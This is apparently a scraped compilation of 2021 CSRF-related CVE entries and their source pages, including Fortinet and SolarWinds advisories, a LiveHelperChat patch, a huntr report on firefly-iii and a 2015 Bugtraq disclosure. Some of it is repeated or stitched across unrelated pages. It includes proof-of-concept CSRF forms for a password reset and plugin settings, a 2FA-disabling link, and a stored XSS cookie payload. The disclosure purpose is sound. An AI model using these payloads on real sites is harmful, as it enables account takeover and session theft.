An insufficient verification of data authenticity vulnerability (CWE-345) in the user interface of FortiProxy verison 2.0.3 and below, 1.2.11 and below and FortiGate verison 7.0.0, 6.4.6 and below, 6.2.9 and below of SSL VPN portal may allow a remote, unauthenticated attacker to conduct a cross-site request forgery (CSRF) attack . Only SSL VPN in web mode or full mode are impacted by this vulnerability.

**![](https://fortiguard.com/static/images/icons/psirt.svg?v=4940) PSIRT Advisories**

**FortiOS & FortiProxy - SSL-VPN portal is vulnerable to CSRF**

**Summary**

An insufficient verification of data authenticity vulnerability (CWE-345) in the user interface of FortiProxy and FortiGate SSL VPN portal may allow a remote, unauthenticated attacker to conduct a cross-site request forgery (CSRF) attack . Only SSL VPN in web mode or full mode are impacted by this vulnerability.

**Affected Products**

FortiProxy versions 2.0.3 and below.  
FortiProxy version 1.2.11 and below.  
FortiGate version 7.0.0.  
FortiGate versions 6.4.6 and below.  
FortiGate versions 6.2.9 and below.  
FortiGate versions 5.6.x and 6.0.x are also impacted.

**Solutions**

Please upgrade to FortiProxy version 2.0.4 or above.

Please upgrade to FortiProxy version 1.2.12 or above.

Please upgrade to FortiGate version 7.0.1 or above.

Please upgrade to FortiGate version 6.4.7 or above.

Please upgrade to FortiGate version 6.2.10 or above.

**Acknowledgement**

Fortinet is pleased to thank Gabriel Costa Castello and Pablo Valle Alvear for bringing this issue to our attention under responsible disclosure.

CVE-2021-26103: Fortiguard

livehelperchat is vulnerable to Cross-Site Request Forgery (CSRF)

@@ -30,7 +30,7 @@

<a title\="<?php echo erTranslationClassLhTranslation::getInstance()->getTranslation('chat/user\_settings','Toggle between dark and white themes');?>" href\="<?php echo erLhcoreClassDesign::baseurl('front/switchdashboard')?>/(action)/mode" class\="dropdown-item pl-2"\><span class\="material-icons"\>settings\_brightness</span\><?php echo erTranslationClassLhTranslation::getInstance()->getTranslation('pagelayout/pagelayout','Dark/bright');?></a\>

</div\>

<div class\="col-6"\>

<a class\="dropdown-item pl-2" href\="<?php echo erLhcoreClassDesign::baseurl('user/logout')?>" title\="<?php echo erTranslationClassLhTranslation::getInstance()->getTranslation('pagelayout/pagelayout','Logout');?>"\><i class\="material-icons"\>exit\_to\_app</i\><?php echo erTranslationClassLhTranslation::getInstance()->getTranslation('pagelayout/pagelayout','Logout');?></a\>

<a class\="dropdown-item pl-2" onclick\="$(this).attr('href',$(this).attr('href')+'/(csfr)/'+confLH.csrf\_token)" href\="<?php echo erLhcoreClassDesign::baseurl('user/logout')?>" title\="<?php echo erTranslationClassLhTranslation::getInstance()->getTranslation('pagelayout/pagelayout','Logout');?>"\><i class\="material-icons"\>exit\_to\_app</i\><?php echo erTranslationClassLhTranslation::getInstance()->getTranslation('pagelayout/pagelayout','Logout');?></a\>

</div\>

</div\>

CVE-2021-4049: csrf for logout url · LiveHelperChat/livehelperchat@e7fe1aa

b2evolution CMS v7.2.3 was discovered to contain a Cross-Site Request Forgery (CSRF) via the User login page. This vulnerability allows attackers to escalate privileges.

There is a Cross-Site Request Forgery (CSRF) on 2bevolution version 7.2.3 attack which forces an end user to execute unwanted actions on a web application in which he/she is currently authenticated. This occurs because web browsers automatically include most credentials with each request, such as session cookies, basic authentication header, IP address, and client side SSL certificates.

<cfif NOT StructIsEmpty(form) >

&lt;cfif NOT CSRFverifyToken(form.token)>

&lt;cfabort showerror="Invalid Token" />

&lt;/cfif>

&lt;cfoutput>&lt;p>Hello, #EncodeForHTML(form.name)#&lt;/p>&lt;/cfoutput>

</cfif>

<html>

<body>

<form action="https://localhost/users/59215b8f0ec7c37a4ca27b00/password\_reset" method="POST">

<input type="hidden" name="utf8" value="â&#156;&#147;" />

<input type="hidden" name="&#95;method" value="patch" />

<input type="hidden" name="old&#95;password" value="phew phew" />

<input type="hidden" name="password" value="qweqji" />

<input type="hidden" name="password&#95;confirmation" value="qweqji" />

<input type="submit" value="Submit request" />

</form>

</body>

</html>

CVE-2021-31631: CSRF

Serv-U server responds with valid CSRFToken when the request contains only Session.

Release date: December 2, 2021

These release notes describe the new features, improvements, and fixed issues in Serv-U File Server 15.2.5. They also provide information about upgrades and describe workarounds for known issues.

If you are looking for previous release notes for Serv-U File Server, see Previous Version documentation.

For details about the latest hotfixes, see Serv-U hotfixes.

Additional Serv-U documentation includes:

*   Serv-U Installation and Upgrade Guide
*   Serv-U 15.2 Administrator Guide
*   System Requirements
*   Getting Started with Serv-U

**New features and improvements**

Serv-U 15.2.5 is a service release containing internal improvements and security fixes, described in the Fixed Issues section.

**Upgrade notes****Licensing**

The Serv-U licensing framework was changed in Serv-U 15.2.3 and a new license key needs to be used to activate this product version otherwise it will not be possible to use it.

If your Serv-U product maintenance is active, you can find your new license key generated on customer portal. Use this new license key to activate Serv-U after installation.

SolarWinds strongly recommend that you upgrade to this version with the new licensing framework as older framework will not be supported in the future.

**Password security**

If you are upgrading from version 15.1.7 or older, increased password security will automatically convert existing MD5 passwords using a more secure algorithm when users connect for the first time after upgrade.

If an account is not used within 90 days of the upgrade, access will be restricted and the user will not be able to log in afterward. The administrator will be required to change their password.

**Fixed issues**

Serv-U 15.2.5 fixes the following issues:

 

Case Number

Description

00784127

Authenticated Serv-U account can be moved to new Collection.

00875523, 00897792

Preload and SubDomains arguments added to HSTS headers.

00888650, 00808537

Issue resolved with HTTP authentication on CentOS 7/8.

n/a

Issue with the server setting option "Allow HTTP sessions to change IP address" has been fixed.

n/a

The limit for the number of passive FTP ports increased to 500.

n/a

The user setting "Change password on next login" has been fixed.

For Serv-U 15.2.4 fixes, see the 15.2.4 Release Notes.

For Serv-U 15.2.3 fixes, see the 15.2.3 Release Notes.

For Serv-U 15.2.2 fixes, see the 15.2.2 Release Notes.

For Serv-U 15.2.1 fixes, see the 15.2.1 Release Notes.

For Serv-U 15.2 fixes, see the 15.2 Release Notes.

**CVE information**

SolarWinds would like to thank our Security Researchers below for reporting on this issue in a responsible manner and working with our security, product, and engineering teams to fix the vulnerability.

    

CVE-ID

Vulnerability Title

Description

Severity

Credit

CVE-2021-35242

A valid CSRF token is present in response to an invalid request

Serv-U server responds with valid CSRFToken when the request contains only Session.

High

N/A

CVE-2021-35245

Broken Access Control Vulnerability for Serv-U

When a user has admin rights in the Serv-U Console, the user can move, create, and delete any files outside the home directory.

High

N/A

**Legal notices**

© 2021 SolarWinds Worldwide, LLC. All rights reserved.

This document may not be reproduced by any means nor modified, decompiled, disassembled, published or distributed, in whole or in part, or translated to any electronic medium or other means without the prior written consent of SolarWinds. All right, title, and interest in and to the software, services, and documentation are and shall remain the exclusive property of SolarWinds, its affiliates, and/or its respective licensors.

SOLARWINDS DISCLAIMS ALL WARRANTIES, CONDITIONS, OR OTHER TERMS, EXPRESS OR IMPLIED, STATUTORY OR OTHERWISE, ON THE DOCUMENTATION, INCLUDING WITHOUT LIMITATION NONINFRINGEMENT, ACCURACY, COMPLETENESS, OR USEFULNESS OF ANY INFORMATION CONTAINED HEREIN. IN NO EVENT SHALL SOLARWINDS, ITS SUPPLIERS, NOR ITS LICENSORS BE LIABLE FOR ANY DAMAGES, WHETHER ARISING IN TORT, CONTRACT OR ANY OTHER LEGAL THEORY, EVEN IF SOLARWINDS HAS BEEN ADVISED OF THE POSSIBILITY OF SUCH DAMAGES.

The SolarWinds, SolarWinds & Design, Orion, and THWACK trademarks are the exclusive property of SolarWinds Worldwide, LLC or its affiliates, are registered with the U.S. Patent and Trademark Office, and may be registered or pending registration in other countries. All other SolarWinds trademarks, service marks, and logos may be common law marks or are registered or pending registration. All other trademarks mentioned herein are used for identification purposes only and are trademarks of (and may be registered trademarks) of their respective companies.

CVE-2021-35242: Serv-U File Server  15.2.5 Release Notes

The Tawk.To Live Chat WordPress plugin before 0.6.0 does not have capability and CSRF checks in the tawkto_setwidget and tawkto_removewidget AJAX actions, available to any authenticated user. The first one allows low-privileged users (including simple subscribers) to change the 'tawkto-embed-widget-page-id' and 'tawkto-embed-widget-widget-id' parameters. Any authenticated user can thus link the vulnerable website to their own Tawk.to instance. Consequently, they will be able to monitor the vulnerable website and interact with its visitors (receive contact messages, answer, ...). They will also be able to display an arbitrary Knowledge Base. The second one will remove the live chat widget from pages.

CVE-2021-24914

firefly-iii is vulnerable to Cross-Site Request Forgery (CSRF)

Valid

Reported on

Nov 23rd 2021

**Description**

CSRF to disable 2FA

**Proof of Concept**

    <a href="http://10.0.2.15/profile/delete-code">CLICK ME!</a>
    

**Impact**

This vulnerability is capable of tricking users to disable 2FA.

![](https://huntr.dev/_nuxt/img/generic-avatar.9a3295c.png)

We are processing your report and will contact the firefly-iii team within 24 hours. 11 days ago

![](https://avatars.githubusercontent.com/u/76475453?v=4)

haxatron

commented 11 days ago

Researcher

My apologies for submitting the reports earlier regarding /debug and /flush. I was under the assumption that the /debug and /flush was available to only admin users, as the /flush UI only appeared in the Administration panel.

![](https://avatars.githubusercontent.com/u/76475453?v=4)

![](https://avatars.githubusercontent.com/u/76475453?v=4)

![](https://avatars.githubusercontent.com/u/76475453?v=4)

haxatron

commented 11 days ago

Researcher

With further testing on the application after I made the reports, I discovered another CSRF unprotected endpoint which allows for a state-change, the endpoint is as listed above.

![](https://avatars.githubusercontent.com/u/5889984?v=4)

Nice find, that's an important one to fix. No worries about the other endpoints, keep it up!

![](https://avatars.githubusercontent.com/u/5889984?v=4)

James Cole validated this vulnerability 11 days ago

haxatron has been awarded the disclosure bounty

The fix bounty is now up for grabs

![](https://avatars.githubusercontent.com/u/55323451?v=4)

Are we able to mark a fix against this report, and we can go ahead and publish the CVE!

![](https://avatars.githubusercontent.com/u/5889984?v=4)

Not yet I completely forgot about it. :D

![](https://avatars.githubusercontent.com/u/55323451?v=4)

No worries, take your time! 🤝

![](https://avatars.githubusercontent.com/u/5889984?v=4)

![](https://huntr.dev/_nuxt/img/generic-avatar.9a3295c.png)

We are processing your report and will contact the firefly-iii team within 24 hours. 11 days ago

![](https://avatars.githubusercontent.com/u/76475453?v=4)

haxatron

commented 11 days ago

Researcher

My apologies for submitting the reports earlier regarding /debug and /flush. I was under the assumption that the /debug and /flush was available to only admin users, as the /flush UI only appeared in the Administration panel.

![](https://avatars.githubusercontent.com/u/76475453?v=4)

![](https://avatars.githubusercontent.com/u/76475453?v=4)

![](https://avatars.githubusercontent.com/u/76475453?v=4)

haxatron

commented 11 days ago

Researcher

With further testing on the application after I made the reports, I discovered another CSRF unprotected endpoint which allows for a state-change, the endpoint is as listed above.

![](https://avatars.githubusercontent.com/u/5889984?v=4)

Nice find, that's an important one to fix. No worries about the other endpoints, keep it up!

![](https://avatars.githubusercontent.com/u/5889984?v=4)

James Cole validated this vulnerability 11 days ago

haxatron has been awarded the disclosure bounty

The fix bounty is now up for grabs

![](https://avatars.githubusercontent.com/u/55323451?v=4)

Are we able to mark a fix against this report, and we can go ahead and publish the CVE!

![](https://avatars.githubusercontent.com/u/5889984?v=4)

Not yet I completely forgot about it. :D

![](https://avatars.githubusercontent.com/u/55323451?v=4)

No worries, take your time! 🤝

![](https://avatars.githubusercontent.com/u/5889984?v=4)

CVE-2021-4005: Cross-Site Request Forgery (CSRF) in firefly-iii

Chamilo LMS v1.11.x was discovered to contain a SQL injection via the doc parameter in main/plagiarism/compilatio/upload.php.

CVE-2021-35414: Security issues - Chamilo LMS

IBM Cognos Analytics 11.1.7 and 11.2.0 could allow a low level user to reas of the application that privileged user should only be allowed to view.  IBM X-Force ID:  201087.

CVE-2021-29716: Security Bulletin: IBM Cognos Analytics has addressed multiple vulnerabilities

The ClickBank Affiliate Ads WordPress plugin through 1.20 does not have CSRF check when saving its settings, allowing attacker to make logged in admin change them via a CSRF attack. Furthermore, due to the lack of escaping when they are outputting, it could also lead to Stored Cross-Site Scripting issues

![bugtraq logo](https://seclists.org/images/bugtraq-logo.png) Bugtraq mailing list archives  

**CSRF/XSS In ClickBank ads Wordpress Plugin**

_From_: kingkaustubh () me com  
_Date_: Wed, 6 May 2015 19:49:47 GMT  

\================================================================
CSRF/Stored XSS Vulnerability in ClickBank Ads V 1.7 Plugin 
================================================================


. contents:: Table Of Content

Overview
========

\* Title :CSRF and Stored XSS Vulnerability in ClickBank Ads  Wordpress Plugin 
\* Author: Kaustubh G. Padwad
\* Plugin Homepage: https://wordpress.org/plugins/clickbank-ads-clickbank-widget/
\* Severity: HIGH
\* Version Affected: Version  1.7 and mostly prior to it
\* Version Tested : Version  1.7
\* version patched:

Description 
===========

Vulnerable Parameter 
--------------------
\* Title:

About Vulnerability
-------------------
This plugin is vulnerable to a combination of CSRF/XSS attack meaning that if an admin user can be tricked to visit a 
crafted URL created by attacker (via spear phishing/social engineering), the attacker can insert arbitrary script into 
admin page. Once exploited, admin's browser can be made to do almost anything the admin user could typically do by 
hijacking admin's cookies etc.

Vulnerability Class
=================== 
Cross Site Request Forgery (https://www.owasp.org/index.php/Cross-Site\_Request\_Forgery\_%28CSRF%29)
Cross Site Scripting (https://www.owasp.org/index.php/Top\_10\_2013-A3-Cross-Site\_Scripting\_(XSS)

Steps to Reproduce: (POC)
=========================

After installing the plugin

1. Goto Dashboard --> Setting --> ClickBank Ads --> Title

2. Insert this payload ## "><script>+-+-1-+-+alert(document.cookie)</script> ## Into  above mention Vulnerable 
parameter Save settings and see XSS in action

3. Visit Click Ads settings page of this plugin anytime later and you can see the script executing as it is stored.

Plugin does not uses any nonces and hence, the same settings can be changed using CSRF attack and the PoC code for the 
same is below

CSRF POC Code
=============

<html>
  <body>
    <form 
action="http://127.0.0.1/wp/wp-admin/options-general.php?page=clickbank-ads-clickbank-widget/clickbank-ads.php"; 
method="POST">
      <input type="hidden" name="cbwec&#91;title&#93;" 
value="&quot;&gt;&gt;&gt;&lt;script&gt;&#43;&#45;&#43;&#45;1&#45;&#43;&#45;&#43;alert&#40;document&#46;cookie&#41;&lt;&#47;script&gt;"
 />
      <input type="hidden" name="cbwec&#91;name&#93;" value="kaustubh" />
      <input type="hidden" name="cbwec&#91;keywordbytitle2&#93;" value="Title" />
      <input type="hidden" name="cbwec&#91;keywords&#93;" value="" />
      <input type="hidden" name="cbwec&#91;adformat&#93;" value="1" />
      <input type="hidden" name="cbwec&#91;width2&#93;" value="100&#37;" />
      <input type="hidden" name="cbwec&#91;width&#93;" value="100&#37;" />
      <input type="hidden" name="cbwec&#91;height&#93;2" value="220" />
      <input type="hidden" name="cbwec&#91;height&#93;" value="220" />
      <input type="hidden" name="cbwec&#91;pos&#93;" value="Top" />
      <input type="hidden" name="cbwec&#91;bordstyle&#93;" value="1" />
      <input type="hidden" name="cbwec&#91;bordcolor&#93;" value="CCCCCC" />
      <input type="hidden" name="cbwec&#91;linkcolor&#93;" value="0000FF" />
      <input type="hidden" name="cbwec&#91;runplugin&#93;" value="1" />
      <input type="hidden" name="cbwec&#91;homepage&#93;" value="1" />
      <input type="hidden" name="cbwec&#91;onlypost&#93;" value="1" />
      <input type="hidden" name="cbwec&#95;submit" value="Save&#32;Â&#187;" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>


credits
=======
\* Kaustubh Padwad 
\* Information Security Researcher
\* kingkaustubh (at) me (dot) com 
\* https://twitter.com/s3curityb3ast
\* http://breakthesec.com
\* https://www.linkedin.com/in/kaustubhpadwad

![](https://seclists.org/images/left-icon-16x16.png)  By Date  ![](https://seclists.org/images/right-icon-16x16.png)       ![](https://seclists.org/images/left-icon-16x16.png)  By Thread  ![](https://seclists.org/images/right-icon-16x16.png)

**Current thread:**

*   **CSRF/XSS In ClickBank ads Wordpress Plugin** _kingkaustubh (May 06)_

Tag

#csrf